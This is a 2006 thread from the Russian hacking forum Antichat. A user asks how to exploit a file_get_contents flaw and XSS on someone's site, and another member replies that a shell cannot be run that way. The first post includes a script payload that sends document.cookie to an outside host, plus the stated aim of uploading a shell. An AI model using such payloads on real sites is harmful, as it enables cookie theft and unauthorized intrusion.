ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

уязвимости скриптов
  #1  
Старый 23.12.2006, 14:14
LKR
Новичок
Регистрация: 23.12.2006
Сообщений: 4
Провел на форуме:
4467

Репутация: 0
Отправить сообщение для LKR с помощью ICQ
По умолчанию уязвимости скриптов

Добровго всем времени суток!
Вот есть проблема. Возможно кто-нибудь да и поможет ее решить.
1.

Существует сайт, в корне лежит скрипт вида script.php?ch=something Это something берется из папки /FOLDER/
при запросе script.php?ch=' вылазит такой текст:

Warning: file_get_contents(/usr/local/apache/htdocs/FOLDER/\'.txt): failed to open stream: No such file or directory in /usr/local/apache/htdocs/script.php on line 13

пробовал делать так: script.php/?ch="><script>document.location='http://www.myhost.narod.ru/hack/r57pws.pl?%20'%20+document.cookie%3C/script%3E где r57pws.pl - знаменитый перловый шелл
вылазит сообщение:

Warning: file_get_contents(/usr/local/apache/htdocs/FOLDER/\">document.location=\'http://www.myhost.narod.ru/hack/r57pws.pl? \'%2.txt): failed to open stream: No such file or directory in /usr/local/apache/htdocs/script.php on line 13

потом решил перекодировать в hex и опять сделал запрос. тоже ничегно не получилось.


2. script.php?view=1132&search_text=%22%3E%3Cscript%3 Ealert%28%27slert%27%29%3C%2Fscript%3E%3C%22&searc h_in_names=1&search_in_com=1&film_year=1&film_cat= 1&search_filmtype=1 - там возможен межсайтвоый скриптинг




вопрос к вам. каким образом успешно использовать эти уязвимости можно?
 
Ответить с цитированием

  #2  
Старый 23.12.2006, 14:42
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

http://ru.php.net/manual/ru/function.file-get-contents.php
за пределы каталога ты не выйдешь, да и файлы отличного расширения не загрузишь =\
 
Ответить с цитированием

  #3  
Старый 23.12.2006, 14:49
LKR
Новичок
Регистрация: 23.12.2006
Сообщений: 4
Провел на форуме:
4467

Репутация: 0
Отправить сообщение для LKR с помощью ICQ
По умолчанию

ну так а серв же линуховый. ядро 2,6,4 ))
 
Ответить с цитированием

  #4  
Старый 23.12.2006, 14:58
LKR
Новичок
Регистрация: 23.12.2006
Сообщений: 4
Провел на форуме:
4467

Репутация: 0
Отправить сообщение для LKR с помощью ICQ
По умолчанию

Дык, вот, за пределы данной папки выходить и не надо, просто нужно залить шелл.
Скажите, можно-ли *.txt файл запустить на сервере как *.php? На сколько я понимаю, если сервер линуховый, то он "понимает" тип фйайла
не по расширению, а по содержимому. Подскажите, как развить и реализовать данную идею. Заранее благодарен.
 
Ответить с цитированием

  #5  
Старый 23.12.2006, 15:07
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

да не запуститца у тебя шелл!!!
Цитата:
Сообщение от http://ru.php.net/manual/ru/function.file-get-contents.php  
file_get_contents -- Получить содержимое файла в виде одной строки
 
Ответить с цитированием

  #6  
Старый 23.12.2006, 19:35
LKR
Новичок
Регистрация: 23.12.2006
Сообщений: 4
Провел на форуме:
4467

Репутация: 0
Отправить сообщение для LKR с помощью ICQ
По умолчанию

т.е. 2 приведенные баги фактически заюзать в полезных целях нельзя?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сканер скриптов на уязвимости gemaglabin Уязвимости 21 27.11.2007 23:44
Какие уязвимости есть в IPB v1.1.2? Inferno Форумы 2 26.06.2007 22:23
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ